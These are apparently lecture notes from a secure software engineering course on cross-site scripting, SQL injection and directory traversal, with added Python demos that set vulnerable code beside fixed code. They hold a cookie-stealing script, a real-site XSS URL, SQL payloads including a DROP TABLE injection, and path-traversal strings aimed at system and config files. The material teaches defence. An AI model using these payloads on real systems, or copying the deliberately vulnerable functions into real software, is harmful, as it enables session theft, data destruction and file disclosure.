Secure Software Engineering: Input Vulnerabilities CPSC 410.
Input Vulnerabilities
• We all know not to run "code" retrieved from suspicious places
• But passive "data" may be interpreted as malicious instructions, depending on where it ends up. The same string is harmless in one place and a file reference in the other:
  System.out.println("/etc/password");
  vs.
  File file = new File("/etc/password");
3 Most Common Input Vulnerabilities on the Web
1. Cross-site Scripting
2. SQL Injection
3. Directory Traversal
See https://www.owasp.org - the Open Web Application Security Project
Cross Site Scripting
• Web browsers should only execute JavaScript from sites that you visit
• But … Web sites often echo values given as input, e.g.
  Input: http://www.foo.com?username='Eric'
  Output page: Hello Eric
• If we put JavaScript into an input, an output page could include that JavaScript! The browser cannot tell the echoed script from the site's own, so it runs with the site's origin and privileges.
• The tester must assume every data entry point is a possible XSS hole.
Example: Invectus on McDonald's
http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
URL-decoded, the queryText parameter is:
queryText="><img src="http://i55.tinypic.com/witu7d.png" height="650" width="1000">
The leading "> is there to close an attribute value (such as value="...") that the search page echoes the query into, so the <img> tag that follows is rendered as part of the page.
Source: http://www.acunetix.com/blog/news/full-disclosure-high-profile-websites-xss/
Malicious Script Input
• Basic example (assume URL encoding)
  http://www.foo.com?username=<script>alert("Hello World")</script>
• Steal the user's cookies: the injected script adds an "image" whose URL carries document.cookie to the attacker's server
  <script type='text/javascript'>
    var img = document.createElement('img');
    img.setAttribute('src', 'http://localhost:8080?cook=' + escape(document.cookie));
    document.body.appendChild(img);
  </script>
• Marking the session cookie HttpOnly keeps it out of document.cookie, but the injected script can still act as the user (send requests, read the page), so it is a mitigation, not a fix
GWT vulnerabilities
• JavaScript on your host page that is unrelated to GWT
• Code you write that sets innerHTML on GWT Widget objects
• Using the JSON API to parse untrusted strings (which ultimately calls JavaScript's eval function)
• JavaScript Native Interface (JSNI) code that you write that does something unsafe (such as setting innerHTML, calling eval, writing directly to the document via document.write, etc.)
Src: https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xss
innerHTML example
<html>
<head>
  <script language="JavaScript">
    function fillMyDiv(newContent) {
      // whatever newContent contains is parsed as HTML, tags included
      document.getElementById('mydiv').innerHTML = newContent;
    }
  </script>
</head>
<body>
  <p>Some text before mydiv.</p>
  <div id="mydiv"></div>
  <p>Some text after mydiv.</p>
</body>
</html>
GWT Guidelines
• Carefully inspect and strip or escape any strings you assign to innerHTML using GWT code
• Carefully inspect any JavaScript strings you pass to GWT's JSON parser
• Carefully inspect any strings you pass to eval or assign to innerHTML via a JSNI method
• Take care in your native JSNI methods to not do anything that would expose you to attacks
Best Solution
• Encode or filter any data which is echoed back into HTML
  – Prefer output encoding at the point of insertion (HTML entity encoding for element content and attribute values). Encoding is context-dependent: data placed inside a JavaScript string or a URL needs that context's encoding, not HTML's.
  – Use an HTML filter (sanitizer) where users are allowed to supply some markup, e.g.
    http://josephoconnell.com/java/xss-html-filter/
    String input = request.getParameter("data");
    String clean = new HTMLInputFilter().filter(input);
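As an added example (not from the slides, and written in Python rather than the course's Java so it runs stand-alone), the reflected echo from the "Cross Site Scripting" and "Malicious Script Input" slides beside its encoded form, in both element-content and attribute-value context. The request URLs, the "Hello" template and the search-box template are constructed for the demo; the third URL mirrors the shape of the McDonald's payload.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request URLs for the demo (not from the original slides).
HELLO_URL = "http://www.foo.com/?username=Eric"
SCRIPT_URL = "http://www.foo.com/?username=%3Cscript%3Ealert(%22Hello%20World%22)%3C/script%3E"
# Same trick as the McDonald's example: close the value="..." attribute, then open an <img>.
ATTR_URL = ("http://www.foo.com/search?queryText="
            "%22%3E%3Cimg%20src%3D%22http://localhost:8080/%3Fcook%3Dx%22%3E")


def param(url: str, name: str) -> str:
    """Return the URL-decoded value of one query parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def greet_vulnerable(username: str) -> str:
    """Element-content context, raw concatenation: the echo the slides describe."""
    return "<p>Hello " + username + "</p>"


def greet_safe(username: str) -> str:
    """Same context with HTML entity encoding; < > & " ' can no longer form markup."""
    return "<p>Hello " + html.escape(username, quote=True) + "</p>"


def search_box_vulnerable(query: str) -> str:
    """Attribute-value context: the search page re-fills its own box with the query."""
    return '<input name="queryText" value="' + query + '">'


def search_box_safe(query: str) -> str:
    """quote=True also encodes the quote characters, so the attribute cannot be closed early."""
    return '<input name="queryText" value="' + html.escape(query, quote=True) + '">'


def has_injected_tag(page: str, tag: str) -> bool:
    """Demo oracle: does the rendered page contain a raw <tag that came from the input?"""
    return ("<" + tag) in page


if __name__ == "__main__":
    for render in (greet_vulnerable, greet_safe):
        print(render(param(SCRIPT_URL, "username")))
    for render in (search_box_vulnerable, search_box_safe):
        print(render(param(ATTR_URL, "queryText")))
```

Note that the same html.escape call covers both contexts shown here only because it encodes the quote characters; the attribute payload does not contain a single `<script>` that a tag-stripping filter would catch, which is why encoding at the output point is preferred over filtering the input.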
Simple Web App
• A Web form that allows the user to look up account details
• Underneath – a Java Web application serving the requests
SQL Injection Example
• Happy-go-lucky SQL statement:
  String query = "SELECT Username, UserID, Password FROM Users WHERE Username = '" + user + "' AND Password = '" + password + "'";
• Leads to SQL injection
  – One of the most common Web application vulnerabilities, caused by lack of input validation
• But how?
  – Typical way to construct a SQL query using string concatenation
  – Looks benign on the surface
  – But let's play with it a bit more…
Injecting Malicious Data (1)
Username: bob, Password: ********
query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob' AND Password = '********'"
Press "Submit"

Injecting Malicious Data (2)
Username: bob'--
query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob'-- ' AND Password = ''"
The attacker's quote closes the string literal and -- comments out the rest of the line, so the password check is never evaluated: bob's row comes back without a password.
Press "Submit"

Injecting Malicious Data (3)
Username: bob'; DROP TABLE Users--
query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob'; DROP TABLE Users-- ' AND Password = ''"
The ; ends the SELECT and starts a second statement. Whether it runs depends on the database driver: some execute stacked statements in one call, others reject more than one statement per call.
Press "Submit"
Heart of the Issue: Tainted Input Data
(Diagram: the hacker's browser sends evil input to the Web application; the application passes it on to the database and back out to other users' browsers as output. The fix is marked at the application boundary, "Insert input checking!", for both cross-site scripting and SQL injection.)
Bobby Tables
http://xkcd.com/327/
Mitigating SQL Injection
• Always use Prepared Statements or Stored Procedures
  – Instead of:
    stmt.execute("UPDATE EMPLOYEES SET SALARY = " + input1 + " WHERE ID = " + input2);
  – Use:
    PreparedStatement pstmt = conn.prepareStatement("UPDATE EMPLOYEES SET SALARY = ? WHERE ID = ?");
    pstmt.setBigDecimal(1, input1);
    pstmt.setInt(2, input2);
    pstmt.executeUpdate();
  – A stored procedure only helps if it does not itself build dynamic SQL out of its arguments
• The account used to make the database connection must have least privilege. If the application only requires read access then the account must be given read access only, so that an injected DROP or UPDATE fails even when the injection itself succeeds.
• Avoid disclosing error information: weak error handling is a great way for an attacker to profile SQL injection attacks. Log the database error server-side and return a generic message to the client.
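As an added example (not from the slides, and in Python with the standard-library sqlite3 driver rather than the course's JDBC so it runs stand-alone), the three "Injecting Malicious Data" payloads run against the string-built query and against the parameterised one, plus the stacked DROP from slide (3) under a driver that rejects stacked statements and one that allows them. The Users row, the password and the table layout are constructed for the demo.

```python
import sqlite3

# Constructed demo data (not from the original slides): one user row.
DEMO_USER = ("bob", "correct horse battery staple")


def make_db() -> sqlite3.Connection:
    """Fresh in-memory Users table; each scenario below gets its own copy."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserID INTEGER PRIMARY KEY, Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users (Username, Password) VALUES (?, ?)", DEMO_USER)
    conn.commit()
    return conn


def build_query(user: str, password: str) -> str:
    """The slides' 'happy-go-lucky' statement: values glued into the SQL text."""
    return ("SELECT Username, UserID, Password FROM Users WHERE Username = '"
            + user + "' AND Password = '" + password + "'")


def login_concat(conn: sqlite3.Connection, user: str, password: str) -> list:
    """Vulnerable: whatever the user typed is parsed as part of the statement."""
    return conn.execute(build_query(user, password)).fetchall()


def login_prepared(conn: sqlite3.Connection, user: str, password: str) -> list:
    """Mitigation: placeholders; the values never touch the SQL grammar."""
    sql = "SELECT Username, UserID, Password FROM Users WHERE Username = ? AND Password = ?"
    return conn.execute(sql, (user, password)).fetchall()


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)).fetchone()
    return row is not None


def stacked_query(conn: sqlite3.Connection, user: str, driver_allows_stacking: bool) -> bool:
    """Slide (3)'s payload. Whether the DROP runs depends on the driver:
    sqlite3's Cursor.execute() rejects a second statement in one call, while
    executescript() (standing in here for drivers that permit stacking) runs it.
    Returns True if the Users table survived."""
    query = build_query(user, "")
    try:
        if driver_allows_stacking:
            conn.executescript(query)
        else:
            conn.execute(query)
    except (sqlite3.Error, sqlite3.Warning):
        pass  # "You can only execute one statement at a time."
    return table_exists(conn, "Users")


def login_response(conn: sqlite3.Connection, user: str, password: str) -> str:
    """Error handling that does not profile the attacker: a real app would log the
    raw database error server-side; the client only ever sees a fixed message."""
    try:
        rows = login_prepared(conn, user, password)
    except sqlite3.Error:
        return "login failed"
    return ("welcome " + rows[0][0]) if rows else "login failed"


if __name__ == "__main__":
    db = make_db()
    print(build_query("bob'--", "anything"))
    print("concat  :", login_concat(db, "bob'--", "anything"))
    print("prepared:", login_prepared(db, "bob'--", "anything"))
    for stacking in (False, True):
        print("Users survives with stacking =", stacking, ":",
              stacked_query(make_db(), "bob'; DROP TABLE Users--", stacking))
```

The `--` payload succeeds against the concatenated query and returns nothing against the prepared one, because the driver sends `bob'--` as a value, not as SQL text. The stacked DROP is the case where least privilege matters: with a read-only account the second statement fails even on a driver that would run it.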
'SQL' injection on GWT
• More a vulnerability of the RPC services
  – Could send arbitrary data to your datastore (once the JavaScript is de-obfuscated)
• Also possible to do JDOQL injection
  – Use Query object and parameters instead of String syntax
    Query query = pm.newQuery(Employee.class);
    query.setFilter("lastName == lastNameParam");
    query.setOrdering("hireDate desc");
    query.declareParameters("String lastNameParam");
    …
    List<Employee> results = (List<Employee>) query.execute("Smith");
    query.closeAll();
Recent Examples
• On March 27, 2011, mysql.com, the official homepage for MySQL, was compromised
• On June 1, 2011, LulzSec stole information from Sony PS3 users
• In August 2011, a hacker stole user records from the Nokia developer site
Directory/Path Traversal
• Occurs when user input is used to create the path for reading a file on disk
  http://myblog.com/view?photo=eric.jpg
  String file = request.getParameter("photo");
  File f = new File("/images/" + file);
See https://www.owasp.org/index.php/Path_Traversal
Directory Traversal
Malicious input: http://myblog.com/view?photo=../../../../../Windows/system.ini
• Has been used to retrieve
  – "web.xml" files
  – Apache conf files
  – UNIX password files
• Other example: you let the user choose between different style templates and save the template filename in their profile
Example 2
• http://some_site.com.br/get-files.jsp?file=report.pdf
• http://some_site.com.br/get-page.php?home=aaa.html
• In these examples it's possible to insert a malicious string as the variable parameter to access files located outside the web publish directory.
• http://some_site.com.br/get-files?file=../../../../some dir/some file
• http://some_site.com.br/../../../../some dir/some file
Best Solution
• Don't construct file paths from user input
• Understand how your web server handles file access
• Create a UUID (Universally Unique IDentifier) for each file and save it as a column with the data; the client only ever sends the database key, never a file name
  String uuid = UUID.randomUUID().toString();
  File savedFile = new File(uuid);
• If a path must be built from input, canonicalize it first (File.getCanonicalPath()) and verify the result still lies under the intended base directory before opening it; a prefix check on the raw string is defeated by ".."
• Example database table for images
  picID picName picDesc picOwner picFormat uuid
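As an added example (not from the slides, and in Python rather than the course's Java so it runs stand-alone), the `new File("/images/" + file)` reader from the "Directory/Path Traversal" slide, a canonicalize-then-check version, and the UUID-keyed store from this slide, exercised in a throwaway directory. The directory tree, the file contents and the in-memory stand-in for the images table are constructed for the demo.

```python
import tempfile
import uuid
from pathlib import Path


def setup_site(base: Path) -> Path:
    """Constructed demo tree (not from the slides): the publish directory
    base/images holding eric.jpg, and a config file one level above it."""
    (base / "images").mkdir()
    (base / "images" / "eric.jpg").write_bytes(b"JPEGDATA")
    (base / "web.xml").write_text("<web-app>secret config</web-app>")
    return base


def read_photo_vulnerable(base: Path, photo: str) -> bytes:
    """new File("/images/" + file): the parameter is concatenated in unchecked,
    so ../ segments (or an absolute path) walk out of the publish directory."""
    return Path(str(base / "images") + "/" + photo).read_bytes()


def read_photo_checked(base: Path, photo: str) -> bytes:
    """Canonicalize first, then verify the result is still inside images/.
    resolve() collapses '..' and follows symlinks; an absolute 'photo' replaces
    the base when joined, which the same check also catches."""
    images = (base / "images").resolve()
    target = (images / photo).resolve()
    if images not in target.parents:
        raise PermissionError("path escapes the images directory: " + photo)
    return target.read_bytes()


class PhotoStore:
    """The slides' preferred design: the file is stored under a random UUID and the
    client only ever supplies picID, which is looked up in the table."""

    def __init__(self, base: Path):
        self.dir = base / "store"
        self.dir.mkdir()
        self.table = {}      # picID -> row; stands in for the images table
        self._next_id = 1

    def save(self, pic_name: str, data: bytes, owner: str = "eric") -> int:
        file_uuid = str(uuid.uuid4())
        (self.dir / file_uuid).write_bytes(data)
        pic_id = self._next_id
        self._next_id += 1
        self.table[pic_id] = {"picName": pic_name, "picOwner": owner, "uuid": file_uuid}
        return pic_id

    def load(self, pic_id: int) -> bytes:
        row = self.table[pic_id]   # unknown id -> KeyError (a 404), never a path
        return (self.dir / row["uuid"]).read_bytes()


def run_demo() -> dict:
    """Exercise all three readers in a temporary directory and return what each did."""
    with tempfile.TemporaryDirectory() as tmp:
        base = setup_site(Path(tmp))
        out = {"normal": read_photo_vulnerable(base, "eric.jpg"),
               "leak": read_photo_vulnerable(base, "../web.xml"),
               "checked_normal": read_photo_checked(base, "eric.jpg")}
        for key, bad in (("rel_blocked", "../web.xml"), ("abs_blocked", str(base / "web.xml"))):
            try:
                read_photo_checked(base, bad)
                out[key] = False
            except PermissionError:
                out[key] = True
        store = PhotoStore(base)
        pic_id = store.save("eric.jpg", b"JPEGDATA")
        out["store_roundtrip"] = store.load(pic_id)
        out["stored_as"] = store.table[pic_id]["uuid"]
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The demo uses a single `../` because the config file sits one level up; the slide's `../../../../../` works just as well in practice, since extra `..` segments past the filesystem root are simply discarded, so an attacker never needs to know the real depth.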
2 Rules to Remember
1. Always assume many users are malicious and want to break your software
2. Don’t assume a Web site is always accessed through a normal Web Browser
Famous last words, “I wrote the JavaScript so that this would never happen”